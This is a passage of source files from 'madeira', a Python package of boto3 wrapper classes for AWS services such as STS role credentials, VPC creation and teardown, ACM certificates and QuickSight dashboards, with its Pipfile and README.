logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(profile_name=profile_name, region=region) self.sts_client = self._session.session.client("sts") # for convenience sts_caller_identity = self.sts_client.get_caller_identity() self.account_id = sts_caller_identity.get("Account") self.user_arn = sts_caller_identity.get("Arn") self.user_id = sts_caller_identity.get("UserId") def get_access_keys(self, duration=3600): token = self.sts_client.get_session_token(DurationSeconds=duration).get( "Credentials" ) return ( token.get("AccessKeyId"), token.get("SecretAccessKey"), token.get("SessionToken"), ) def write_role_credentials(self, aws_profile, role_arn, role_session_name=None, duration=None): role_session_name = role_session_name if role_session_name else uuid.uuid4().hex creds = self.sts_client.assume_role( RoleArn=role_arn, RoleSessionName=role_session_name, DurationSeconds=duration) aws_creds_file = os.path.expanduser("~/.aws/credentials") # update the AWS credentials file config = configparser.ConfigParser() config.read(aws_creds_file) if aws_profile not in config: config[aws_profile] = {} config[aws_profile] = { "region": "us-east-1", "aws_access_key_id": creds["Credentials"]["AccessKeyId"], "aws_secret_access_key": creds["Credentials"]["SecretAccessKey"], "aws_session_token": creds["Credentials"]["SessionToken"], } with open(aws_creds_file, "w") as configfile: config.write(configfile) <file_sep>[[source]] name = "pypi" url = "https://pypi.org/simple" verify_ssl = true [dev-packages] madeira-utils-editable = {path = "./../madeira-utils",editable = true} [packages] madeira = {path = ".",editable = true} [requires] python_version = "3.8" <file_sep>from madeira import session, sts from madeira_utils import loggers class Ecs(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=profile_name, region=region) self.ecs_client = self._session.session.client("ecs") def list_tasks(self, cluster): tasks = self.ecs_client.list_tasks(cluster=cluster).get('taskArns') if not tasks: return [] return self.ecs_client.describe_tasks( cluster=cluster, tasks=tasks).get('tasks') def stop_tasks(self, cluster, tasks, reason=''): results = [] for task in tasks: self._logger.info('Stopping task: %s', task['taskArn']) self._logger.info(' Container name(s): %s', ','.join( [container['name'] for container in task['containers']])) results.append( self.ecs_client.stop_task(cluster=cluster, task=task['taskArn'], reason=reason)) return results <file_sep>from madeira import session from madeira_utils import loggers class ElbV2(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.elbv2_client = self._session.session.client('elbv2') def disable_termination_protection(self, arn): return self.elbv2_client.modify_load_balancer_attributes( LoadBalancerArn=arn, Attributes=[{'Key': 'deletion_protection.enabled', 'Value': 'false'}] ) def get_load_balancer_fqdn(self, name): return self.elbv2_client.describe_load_balancers(Names=[name])['LoadBalancers'][0]['DNSName'] def list_load_balancers(self): return self.elbv2_client.describe_load_balancers().get('LoadBalancers') <file_sep>import time from madeira import session from madeira_utils import loggers class Acm(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.acm_client = self._session.session.client('acm') self._max_status_checks = 20 self._status_check_interval = 20 def delete_cert_by_domain_name(self, domain_name): cert = self.get_cert_by_domain(domain_name) if not cert: self._logger.warning("No ACM certificate exists for domain: %s", domain_name) return self._logger.info("Deleting certificate for domain: %s with ARN: %s", domain_name, cert['CertificateArn']) return self.acm_client.delete_certificate(CertificateArn=cert['CertificateArn']) def get_cert_by_domain(self, domain_name): for cert in self.acm_client.list_certificates().get('CertificateSummaryList'): if cert['DomainName'] == domain_name: return cert return {} def get_cert_dns_validation_meta(self, certificate_arn): return self.acm_client.describe_certificate(CertificateArn=certificate_arn).get('Certificate').get( 'DomainValidationOptions')[0].get('ResourceRecord') def request_cert_with_dns_validation(self, domain_name): # check if cert has already been requested certificate_arn = self.get_cert_by_domain(domain_name).get('CertificateArn') if certificate_arn: self._logger.info('Certificate with domain: %s has already been requested', domain_name) else: self._logger.info('Requesting ACM cert with domain name: %s', domain_name) certificate_arn = self.acm_client.request_certificate( DomainName=domain_name, ValidationMethod='DNS').get('CertificateArn') self._logger.info('Waiting for DNS validation meta to propagate') # TODO: something more intelligent than time.sleep time.sleep(10) self._logger.debug('Got certificate ARN: %s', certificate_arn) return certificate_arn, self.get_cert_dns_validation_meta(certificate_arn) def wait_for_issuance(self, certificate_arn): max_status_checks = 30 status_check_interval = 60 # wait for certificate issuance status_check = 0 self._logger.info('Waiting on ACM certificate issuance confirmation. ' 'This may take up to 30 minutes or longer') while status_check < max_status_checks: status_check += 1 # look for our cert to be in the ISSUED state. for cert in self.acm_client.list_certificates( CertificateStatuses=['ISSUED']).get('CertificateSummaryList'): if cert['CertificateArn'] == certificate_arn: self._logger.info('Certificate: %s is now issued', certificate_arn) return True self._logger.debug('Certificate: %s is not yet issued - waiting', certificate_arn) if status_check >= max_status_checks: raise RuntimeError(f'Timed out waiting for Certificate {certificate_arn} to be issued') time.sleep(status_check_interval) <file_sep>from madeira import session from madeira_utils import loggers class Redshift(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.redshift_client = self._session.session.client('redshift') def get_clusters(self): return self.redshift_client.describe_clusters() <file_sep>import time import botocore.exceptions from madeira import session, sts from madeira_utils import loggers class Vpc(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.ec2_client = self._session.session.client("ec2") self.ec2_resource = self._session.session.resource("ec2") self._vpc_delete_wait = 30 def _add_name_to_subnets(self, subnets): for subnet in subnets: for tag in subnet.get("Tags"): if tag["Key"] == "Name": self._logger.debug( "Adding subnet name: %s to subnet: %s", tag["Value"], subnet["SubnetId"] ) subnet["Name"] = tag["Value"] def _nat_gateway_status_wait(self, nat_gateway_id, status): max_status_checks = 10 status_check_interval = 20 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 nat_gateway = self.ec2_client.describe_nat_gateways( Filters=[{"Name": "nat-gateway-id", "Values": [nat_gateway_id]}] ).get("NatGateways")[0] if nat_gateway["State"] == status: self._logger.debug( "NAT gateway %s is now: %s", nat_gateway["NatGatewayId"], status ) return self._logger.debug( "NAT gateway: %s status is: %s - waiting for status: %s", nat_gateway["NatGatewayId"], nat_gateway["State"], status, ) if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for NAT gateway: %s to be available", nat_gateway["NatGatewayId"], ) time.sleep(status_check_interval) def _peering_connection_wait(self, peering_id): max_status_checks = 20 status_check_interval = 10 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: self.ec2_client.describe_vpc_peering_connections( VpcPeeringConnectionIds=[peering_id]) self._logger.debug("VPC Peering Connection %s is now available", peering_id) break except self.ec2_client.exceptions.ClientError as e: if "InvalidVpcPeeringConnectionID.NotFound" not in str(e): raise if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for VPC peering connection: %s to be available", peering_id, ) self._logger.debug( "VPC peering connection: %s is not yet available - waiting...", peering_id ) time.sleep(status_check_interval) def accept_vpc_peering_connection(self, peering_id, name): self._logger.info( "Accepting peering connection: %s in account: %s", peering_id, self._sts.account_id, ) self._peering_connection_wait(peering_id) self.ec2_client.create_tags( Resources=[peering_id], Tags=[{"Key": "Name", "Value": name}] ) return self.ec2_client.accept_vpc_peering_connection( VpcPeeringConnectionId=peering_id ) def create_and_attach_igw(self, vpc_id): if self.ec2_client.describe_internet_gateways(Filters=[ {'Name': 'attachment.vpc-id', 'Values': [vpc_id]}, ]).get('InternetGateways'): self._logger.info('There is already an internet gateway attached to VPC: %s', vpc_id) return self._logger.info("Creating internet gateway") igw_id = self.ec2_client.create_internet_gateway()["InternetGateway"][ "InternetGatewayId" ] self._logger.info("Attaching internet gateway to VPC") self.ec2_client.attach_internet_gateway(InternetGatewayId=igw_id, VpcId=vpc_id) # add route for igw to VPC default route table self._logger.info("Adding route for internet gateway") self.ec2_client.create_route( DestinationCidrBlock="0.0.0.0/0", GatewayId=igw_id, RouteTableId=self.ec2_client.describe_route_tables( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] )["RouteTables"][0]["RouteTableId"], ) def create_nat_gw_and_rt(self, vpc_id, name, public_subnet_id, private_subnet_id): if self.ec2_client.describe_nat_gateways( Filters=[ {"Name": "subnet-id", "Values": [public_subnet_id]}, {"Name": "tag:Name", "Values": [name]}, {"Name": "vpc-id", "Values": [vpc_id]}, ] ).get("NatGateways"): self._logger.info( "NAT Gateway: %s using subnet: %s in VPC: %s already exists", name, public_subnet_id, vpc_id, ) return self._logger.info("Allocating elastic IP for NAT gateway") eip_alloc_id = self.ec2_client.allocate_address(Domain="vpc").get( "AllocationId" ) self._logger.info("Creating NAT gateway: %s", name) nat_gateway_id = ( self.ec2_client.create_nat_gateway( AllocationId=eip_alloc_id, SubnetId=public_subnet_id ) .get("NatGateway") .get("NatGatewayId") ) self.ec2_client.create_tags( Resources=[nat_gateway_id], Tags=[{"Key": "Name", "Value": name}] ) self._nat_gateway_status_wait(nat_gateway_id, "available") # create a new route table, set up routes self._logger.info("Creating route table") route_table_id = ( self.ec2_client.create_route_table(VpcId=vpc_id) .get("RouteTable") .get("RouteTableId") ) max_status_checks = 20 status_check_interval = 10 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: self.ec2_client.describe_route_tables(RouteTableIds=[route_table_id]) self._logger.debug("Route Table %s is now available", route_table_id) break except self.ec2_client.exceptions.ClientError as e: if "InvalidRouteTableID.NotFound" not in str(e): raise if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for route_table: %s to be available", route_table_id, ) self._logger.debug( "Route table: %s is not yet available - waiting...", route_table_id ) time.sleep(status_check_interval) self.ec2_client.create_tags( Resources=[route_table_id], Tags=[{"Key": "Name", "Value": name}] ) self._logger.info("Adding internet-facing route") self.ec2_client.create_route( DestinationCidrBlock="0.0.0.0/0", GatewayId=nat_gateway_id, RouteTableId=route_table_id, ) # associate this route table with the given "private" subnet self._logger.info( "Associating route table: %s with private subnet: %s", route_table_id, private_subnet_id, ) self.ec2_client.associate_route_table( RouteTableId=route_table_id, SubnetId=private_subnet_id ) def create_vpc_peer_route(self, cidr_block, route_table_id, vpc_peer_conn_id): try: self._logger.info( "Creating route to CIDR: %s in route table: %s via VPC peering connection: %s in account: %s", cidr_block, route_table_id, vpc_peer_conn_id, self._sts.account_id, ) return self.ec2_client.create_route( DestinationCidrBlock=cidr_block, RouteTableId=route_table_id, VpcPeeringConnectionId=vpc_peer_conn_id, ) except self.ec2_client.exceptions.ClientError as e: if "RouteAlreadyExists" in str(e): self._logger.info("Route already exists") return else: raise def create_subnet(self, subnet_name, subnet_cidr, availability_zone, vpc_id): existing_subnets = self.ec2_client.describe_subnets( Filters=[ {"Name": "availability-zone", "Values": [availability_zone]}, {"Name": "cidr-block", "Values": [subnet_cidr]}, {"Name": "vpc-id", "Values": [vpc_id]}, ]).get("Subnets") if existing_subnets: self._logger.info( "Subnet in AZ: %s with CIDR: %s in VPC: %s already exists", availability_zone, subnet_cidr, vpc_id, ) return existing_subnets[0]['SubnetId'] self._logger.info( "Creating subnet: %s with CIDR: %s in AZ: %s", subnet_name, subnet_cidr, availability_zone, ) subnet = self.ec2_client.create_subnet( AvailabilityZone=availability_zone, CidrBlock=subnet_cidr, VpcId=vpc_id ) subnet_id = subnet["Subnet"]["SubnetId"] max_status_checks = 10 status_check_interval = 5 # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: subnet = self.ec2_client.describe_subnets(SubnetIds=[subnet_id]).get( "Subnets" )[0] except self.ec2_client.exceptions.ClientError as e: if "InvalidSubnetID.NotFound" not in str(e): raise if subnet["State"] == "available": self._logger.debug("Subnet %s is now available", subnet["SubnetId"]) break self._logger.debug( "Subnet: %s status is: %s - waiting...", subnet["SubnetId"], subnet["State"], ) if status_check >= max_status_checks: raise RuntimeError( "Timed out waiting for subnet: %s to be available", subnet["SubnetId"], ) time.sleep(status_check_interval) self._logger.debug( "Tagging subnet %s with name: %s", subnet["SubnetId"], subnet_name ) self.ec2_client.create_tags( Resources=[subnet_id], Tags=[{"Key": "Name", "Value": subnet_name}] ) return subnet_id def create_vpc(self, cidr_block, vpc_name): # if the VPC already exists, return the ID of the extant VPC (if there are many, we're in trouble) vpcs_with_cidr = self.ec2_client.describe_vpcs( Filters=[{"Name": "cidr", "Values": [cidr_block]}] ).get("Vpcs") if vpcs_with_cidr: self._logger.info("VPC with CIDR: %s already exists", cidr_block) return vpcs_with_cidr[0]["VpcId"] self._logger.info("Creating VPC with CIDR: %s", cidr_block) vpc = self.ec2_resource.create_vpc(CidrBlock=cidr_block) self._logger.debug("Waiting for VPC to be available") try: vpc.wait_until_available( Filters=[ {"Name": "state", "Values": ["available"]}, {"Name": "vpc-id", "Values": [vpc.id]}, ] ) # TODO: figure out if there's a client or resource-specific way of doing this so we don't # have to rely on botocore.exceptions. except botocore.exceptions.WaiterError: self._logger.debug("VPC waiter not yet ready - trying again") time.sleep(5) vpc.wait_until_available( Filters=[ {"Name": "state", "Values": ["available"]}, {"Name": "vpc-id", "Values": [vpc.id]}, ] ) vpc.create_tags(Tags=[{"Key": "Name", "Value": vpc_name}]) return vpc.id def create_vpc_peering_connection(self, vpc_id, peer_account_id, peer_vpc_id, name): vpc_peering_connection_id = self.get_vpc_peering_connection_id(vpc_id, peer_account_id, peer_vpc_id) if vpc_peering_connection_id: self._logger.info("VPC peering from %s in account %s to %s in account %s already exists", vpc_id, self._sts.account_id, peer_vpc_id, peer_account_id,) return vpc_peering_connection_id self._logger.info("Requesting VPC peering from %s in account %s to %s in account %s", vpc_id, self._sts.account_id, peer_vpc_id, peer_account_id) # TODO: monitor the status and return peering connection ID once in "pending-acceptance" state vpc_peer_conn_id = self.ec2_client.create_vpc_peering_connection( PeerOwnerId=peer_account_id, PeerVpcId=peer_vpc_id, VpcId=vpc_id ).get("VpcPeeringConnection").get("VpcPeeringConnectionId") # appears to be only way to name a VPC peering connection as of 2/13/2020 self._peering_connection_wait(vpc_peer_conn_id) self.ec2_client.create_tags(Resources=[vpc_peer_conn_id], Tags=[{"Key": "Name", "Value": name}]) return vpc_peer_conn_id def delete_vpc(self, vpc_id): vpc = self.ec2_resource.Vpc(id=vpc_id) vpc.delete() def deep_delete_vpc(self, vpc_id): # we have to be very comprehensive since there is no way to do a "delete VPC and cascade" operation via # high-level API call. if not vpc_id: return self._logger.info("Deleting VPC child objects") vpc = self.ec2_resource.Vpc(id=vpc_id) if not vpc.id: self._logger.debug("VPC: %s does not exist", vpc_id) return # detach default dhcp_options if associated with the vpc dhcp_options_default = self.ec2_resource.DhcpOptions("default") if dhcp_options_default: dhcp_options_default.associate_with_vpc(VpcId=vpc.id) # delete all NAT gateways associated with the VPC for nat_gw in self.ec2_client.describe_nat_gateways( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, { "Name": "state", "Values": ["pending", "failed", "available", "deleting"], }, ] ).get("NatGateways"): self._logger.debug("Deleting NAT gateway: %s", nat_gw["NatGatewayId"]) self.ec2_client.delete_nat_gateway(NatGatewayId=nat_gw["NatGatewayId"]) self._nat_gateway_status_wait(nat_gw["NatGatewayId"], "deleted") # detach and delete all gateways associated with the vpc for gw in vpc.internet_gateways.all(): self._logger.debug("Detaching and deleting Internet gateway: %s", gw.id) vpc.detach_internet_gateway(InternetGatewayId=gw.id) gw.delete() # delete all route table associations for rt in vpc.route_tables.all(): for rta in rt.associations: # delete any associations other than that which denotes a route table is a "main" route table if not rta.main: self._logger.debug("Deleting route table association: %s", rta.id) rta.delete() # delete all route tables for rt in vpc.route_tables.all(): # this has the side effect of never deleting the main route table (which gets deleted by virtue of deleting # the VPC / cannot be explicitly deleted by itself) since it always has the "main" association... if not rt.associations: self._logger.debug("Deleting route table: %s", rt.id) rt.delete() # delete our security groups for sg in vpc.security_groups.all(): if sg.group_name != "default": self._logger.debug("Deleting security group: %s", sg.id) sg.delete() # delete any vpc peering connections for vpcpeer in self.ec2_client.describe_vpc_peering_connections( Filters=[{"Name": "requester-vpc-info.vpc-id", "Values": [vpc_id]}] )["VpcPeeringConnections"]: self._logger.debug( "Deleting VPC peering connection: %s", vpcpeer["VpcPeeringConnectionId"] ) self.ec2_resource.VpcPeeringConnection( vpcpeer["VpcPeeringConnectionId"] ).delete() # delete non-default network acls for netacl in vpc.network_acls.all(): if not netacl.is_default: self._logger.debug("Deleting network ACL: %s", netacl.id) netacl.delete() # delete network interfaces for subnet in vpc.subnets.all(): for interface in subnet.network_interfaces.all(): self._logger.debug("Deleting interface: %s", interface.id) interface.delete() self._logger.debug("Deleting subnet: %s", subnet.id) subnet.delete() # release elastic IPs for eip in self.ec2_client.describe_addresses().get("Addresses"): self._logger.debug("Releasing elastic IP: %s", eip["AllocationId"]) self.ec2_client.release_address(AllocationId=eip["AllocationId"]) # finally, delete the vpc self._logger.info("Deleting VPC: %s", vpc_id) vpc.delete() def delete_default_vpc(self): vpc_id = self.get_default_vpc_id() if not vpc_id: self._logger.info("There is no default VPC to delete") return self._logger.info( "Giving some time for deleted default VPC artifacts, if any, to be cleared" ) time.sleep(self._vpc_delete_wait) return self.deep_delete_vpc(vpc_id) def delete_vpc_by_name(self, vpc_name): self.delete_vpc(self.get_vpc_id_by_name(vpc_name)) def delete_vpc_peer_route(self, cidr_block, route_table_id): try: self._logger.info( "Deleting route to CIDR: %s in route table: %s in account: %s", cidr_block, route_table_id, self._sts.account_id, ) self.ec2_client.delete_route( DestinationCidrBlock=cidr_block, RouteTableId=route_table_id ) except self.ec2_client.exceptions.ClientError as e: if "InvalidRoute.NotFound" in str(e): self._logger.info(" route does not exist") return raise def enable_dns_hostnames(self, vpc_id): self._logger.info("Enabling DNS hostnames support for VPC %s", vpc_id) self.ec2_client.modify_vpc_attribute( VpcId=vpc_id, EnableDnsHostnames={"Value": True} ) def get_vpc_by_name(self, vpc_name): all_vpcs = self.ec2_client.describe_vpcs( Filters=[{"Name": "tag:Name", "Values": [vpc_name]}] ) for vpc in all_vpcs["Vpcs"]: for tag in vpc["Tags"]: if tag["Key"] == "Name" and tag["Value"] == vpc_name: return vpc return {} def get_vpc_id_by_name(self, vpc_name): return self.get_vpc_by_name(vpc_name).get('VpcId') def get_vpc_peering_connection_id(self, vpc_id, peer_account_id, peer_vpc_id): vpc_peering_conns = self.ec2_client.describe_vpc_peering_connections( Filters=[ {"Name": "accepter-vpc-info.vpc-id", "Values": [peer_vpc_id]}, {"Name": "accepter-vpc-info.owner-id", "Values": [peer_account_id]}, {"Name": "requester-vpc-info.vpc-id", "Values": [vpc_id]}, { "Name": "status-code", "Values": ["pending-acceptance", "active", "provisioning"], }, ] ) if vpc_peering_conns.get("VpcPeeringConnections"): return vpc_peering_conns.get("VpcPeeringConnections")[0].get( "VpcPeeringConnectionId" ) def get_default_vpc_id(self): all_vpcs = self.ec2_client.describe_vpcs() for vpc in all_vpcs["Vpcs"]: if vpc["IsDefault"]: return vpc["VpcId"] return "" def get_route_table_in_vpc(self, name, vpc_id): return ( self.ec2_client.describe_route_tables( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "tag:Name", "Values": [name]}, ] ) .get("RouteTables")[0] .get("RouteTableId") ) def get_route_tables_in_vpc(self, vpc_id): return [ route_table.get("RouteTableId") for route_table in self.ec2_client.describe_route_tables( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] ).get("RouteTables") ] def get_main_route_table_by_vpc_id(self, vpc_id): return ( self.ec2_client.describe_route_tables( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "association.main", "Values": ["true"]}, ] ) .get("RouteTables")[0] .get("RouteTableId") ) def get_security_group_id(self, vpc_id, name="default"): vpc = self.ec2_resource.Vpc(id=vpc_id) for sg in vpc.security_groups.all(): if sg.group_name == name: return sg.group_id def get_subnet_id_for_az(self, vpc_id, availability_zone): subnets = self.ec2_client.describe_subnets( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "availability-zone", "Values": [availability_zone]}, ] ) try: return subnets["Subnets"][0]["SubnetId"] except IndexError: return False def get_subnets_for_az(self, vpc_id, availability_zone): subnets = self.ec2_client.describe_subnets( Filters=[ {"Name": "vpc-id", "Values": [vpc_id]}, {"Name": "availability-zone", "Values": [availability_zone]}, ] ).get("Subnets") self._add_name_to_subnets(subnets) return subnets def get_subnet_ids_for_vpc(self, vpc_id): subnets = self.ec2_client.describe_subnets( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] ) return [subnet["SubnetId"] for subnet in subnets["Subnets"]] def get_subnets_for_vpc(self, vpc_id): subnets = self.ec2_client.describe_subnets( Filters=[{"Name": "vpc-id", "Values": [vpc_id]}] ).get("Subnets") self._add_name_to_subnets(subnets) return subnets <file_sep>from madeira import session from madeira_utils import loggers class Kms(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.kms_client = self._session.session.client('kms') def get_key(self, key_id): return self.kms_client.describe_key(KeyId=key_id) def get_key_arn(self, key_id): try: return self.get_key(key_id).get('KeyMetadata').get('Arn') except self.kms_client.exceptions.NotFoundException: return False <file_sep>from madeira import session, sts from madeira_utils import loggers class Iam(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.iam_client = self._session.session.client("iam") def get_role_arn(self, name): return f"arn:aws:iam::{self._sts.account_id}:role/{name}" <file_sep># Madeira This is a python package which provides wrapper classes and convenience methods for the Amazon Web Servces (AWS) python deployment SDK (`boto3`). In several deployment automation projects I've built over the years, I've found that "bare metal control" over interaction with AWS services allows me to leverage features released by AWS into `boto3` the moment they're available, rather than waiting on 3rd party CM tool authors/vendors to wrap *all* required functionality. Concurrently, this reduces the footprint of project external dependencies. Given that most projects I work on are "pure python", this approach requires less mental context switching compared to using template-driven CM tools. ## Installation This package is hosted on [PyPI](pypi.org), so you may simply: ``` pip install --user madeira ``` ## Support Intended for use with Python 3.7 or later. ## Limitations Not all AWS services are represented; similarly, not all features of AWS services that are represented here are "wrapped". ## Package name origins Since the AWS python SDK is called `boto`, which refers to Amazon River dolphins, I figured I'd attempt to follow the pattern and name this after a tributary of the Amazon River, given that the point of these wrappers is to deploy objects into AWS, The analogy seemed to solve the problem of developer naming creativity... :stuck_out_tongue_winking_eye:<file_sep>from madeira import session, sts from madeira_utils import loggers import time class Quicksight(object): DASHBOARD_ACTIONS = [ "quicksight:DescribeDashboard", "quicksight:ListDashboardVersions", "quicksight:UpdateDashboardPermissions", "quicksight:QueryDashboard", "quicksight:UpdateDashboard", "quicksight:DeleteDashboard", "quicksight:DescribeDashboardPermissions", "quicksight:UpdateDashboardPublishedVersion", ] DASHBOARD_READER_ACTIONS = [ "quicksight:DescribeDashboard", "quicksight:ListDashboardVersions", "quicksight:QueryDashboard", ] DATA_SET_ACTIONS = [ "quicksight:DescribeDataSet", "quicksight:DescribeDataSetPermissions", "quicksight:PassDataSet", "quicksight:DescribeIngestion", "quicksight:ListIngestions", "quicksight:UpdateDataSet", "quicksight:DeleteDataSet", "quicksight:CreateIngestion", "quicksight:CancelIngestion", "quicksight:UpdateDataSetPermissions", ] DATA_SOURCE_ACTIONS = [ "quicksight:DescribeDataSource", "quicksight:DescribeDataSourcePermissions", "quicksight:PassDataSource", ] TEMPLATE_ACTIONS = ["quicksight:DescribeTemplate"] def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=profile_name, region=region) self.quicksight_client = self._session.session.client("quicksight") self._max_status_checks = 20 self._status_check_interval = 5 def _wait_for_data_source_status(self, name, desired_status, max_status_checks=None, status_check_interval=None): max_status_checks = max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 data_source = self.quicksight_client.describe_data_source( AwsAccountId=self._sts.account_id, DataSourceId=name).get("DataSource") if data_source["Status"].endswith("FAILED"): self._logger.error( "Data source: %s has known bad status: %s", name, data_source["Status"]) self._logger.error("Error message: %s", data_source["ErrorInfo"]["Message"]) self._logger.error("Please fix the issue and try again.") return False elif data_source["Status"] == desired_status: self._logger.info("Data source: %s deployment complete", name) return True self._logger.debug("Data source: %s status is: %s", name, data_source["Status"]) self._logger.debug("Waiting...") if status_check >= max_status_checks: raise RuntimeError("Timed out waiting for QuickSight Data Source to deploy") time.sleep(status_check_interval) def copy_or_update_analysis_template( self, name, source_template_id, permissions=None, source_account_id=None, max_status_checks=None, status_check_interval=None): source_account_id = source_account_id if source_account_id else self._sts.account_id source_template_arn = (f"arn:aws:quicksight:{self._session.region}:{source_account_id}:" f"template/{source_template_id}") self._logger.debug("Using source template ARN: %s", source_template_arn) args = dict( AwsAccountId=self._sts.account_id, TemplateId=name, Name=name, SourceEntity={"SourceTemplate": {"Arn": source_template_arn}}, ) try: self.quicksight_client.describe_template(AwsAccountId=self._sts.account_id, TemplateId=name) # TODO: use update_template instead / get it working. self._logger.info( "Deleting quicksight template: %s from account: %s", name, self._sts.account_id) self.quicksight_client.delete_template(AwsAccountId=self._sts.account_id, TemplateId=name) # self._logger.info('Updating quicksight template: %s from template: %s from account: %s', # name, source_template_id, source_account_id) # result = self._quicksight_client.update_template(**args) # if permissions: # self._logger.info('Updating permissions on quicksight template: %s', name) # self._quicksight_client.update_template_permissions(AwsAccountId=self._sts.account_id, TemplateId=name, # GrantPermissions=permissions) # return result except self.quicksight_client.exceptions.ResourceNotFoundException: pass self._logger.info("Creating quicksight template: %s in account: %s from template: %s from account: %s", name, self._sts.account_id, source_template_id, source_account_id) if permissions: args["Permissions"] = permissions self.quicksight_client.create_template(**args) max_status_checks = (max_status_checks if max_status_checks else self._max_status_checks) status_check_interval = (status_check_interval if status_check_interval else self._status_check_interval) # wait for stack "final" state status_check = 0 template_version = (self.quicksight_client.describe_template( AwsAccountId=self._sts.account_id, TemplateId=name).get("Template").get("Version")) while status_check < max_status_checks: status_check += 1 if template_version["Status"].endswith("FAILED"): errors = ",".join([f"{error['Type']} - {error['Message']}" for error in template_version["Errors"]]) self._logger.error("Template: %s has known bad status: %s", name, template_version["Status"]) self._logger.error("Error message(s): %s", errors) self._logger.error("Please fix the issue and try again.") return False elif template_version["Status"] == "CREATION_SUCCESSFUL": self._logger.info("Template: %s deployment complete", name) return True self._logger.debug("Data source: %s status is: %s", name, template_version["Status"]) self._logger.debug("Waiting...") if status_check >= max_status_checks: raise RuntimeError("Timed out waiting for QuickSight template to deploy") time.sleep(status_check_interval) template_version = self.quicksight_client.describe_template( AwsAccountId=self._sts.account_id, TemplateId=name).get("Template").get("Version") version_number = template_version["VersionNumber"] self.quicksight_client.update_template_published_version( AwsAccountId=self._sts.account_id, TemplateId=name, VersionNumber=version_number ) def create_or_update_analysis_template( self, name, source_analysis_id, data_set_references, permissions=None, source_account_id=None): source_account_id = source_account_id if source_account_id else self._sts.account_id source_analysis_arn = (f"arn:aws:quicksight:{self._session.region}:{source_account_id}:" f"analysis/{source_analysis_id}") args = dict( AwsAccountId=self._sts.account_id, TemplateId=name, Name=name, SourceEntity={ "SourceAnalysis": { "Arn": source_analysis_arn, "DataSetReferences": data_set_references, } } ) try: self.quicksight_client.describe_template(AwsAccountId=self._sts.account_id, TemplateId=name) self._logger.info("Updating quicksight template: %s from analysis: %s", name, source_analysis_id) self.quicksight_client.update_template(**args) if permissions: self._logger.info("Updating permissions on quicksight template: %s", name) self.quicksight_client.update_template_permissions( AwsAccountId=self._sts.account_id, TemplateId=name, GrantPermissions=permissions) except self.quicksight_client.exceptions.ResourceNotFoundException: self._logger.info("Creating quicksight template: %s from analysis: %s", name, source_analysis_id) if permissions: args["Permissions"] = permissions return self.quicksight_client.create_template(**args) def create_or_update_dashboard_from_template( self, name, dashboard_id, source_template_id, data_set_references, permissions=None, publish_options=None, source_account_id=None, max_status_checks=None, status_check_interval=None): source_account_id = source_account_id if source_account_id else self._sts.account_id source_template_arn = (f"arn:aws:quicksight:{self._session.region}:{source_account_id}:" f"template/{source_template_id}") if not publish_options: publish_options = { "AdHocFilteringOption": {"AvailabilityStatus": "ENABLED"}, "ExportToCSVOption": {"AvailabilityStatus": "DISABLED"}, "SheetControlsOption": {"VisibilityState": "EXPANDED"}, } args = dict( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, Name=name, SourceEntity={ "SourceTemplate": { "DataSetReferences": data_set_references, "Arn": source_template_arn, } }, DashboardPublishOptions=publish_options, ) try: dashboard = self.quicksight_client.describe_dashboard( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id) self._logger.info("Updating quicksight dashboard: %s from template: %s", name, source_template_id) self.quicksight_client.update_dashboard(**args) self._logger.info("Publishing version: %s of dashboard: %s", dashboard["Dashboard"]["Version"]["VersionNumber"], name) self.quicksight_client.update_dashboard_published_version( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, VersionNumber=dashboard["Dashboard"]["Version"]["VersionNumber"]) if permissions: self._logger.info("Updating permissions for dashboard: %s", name) self.quicksight_client.update_dashboard_permissions( AwsAccountId=self._sts.account_id, DashboardId=dashboard_id, GrantPermissions=permissions, ) except self.quicksight_client.exceptions.ResourceNotFoundException: if permissions: args["Permissions"] = permissions self._logger.info("Creating dashboard: %s from template: %s", name, source_template_id) self.quicksight_client.create_dashboard(**args) max_status_checks = max_status_checks if 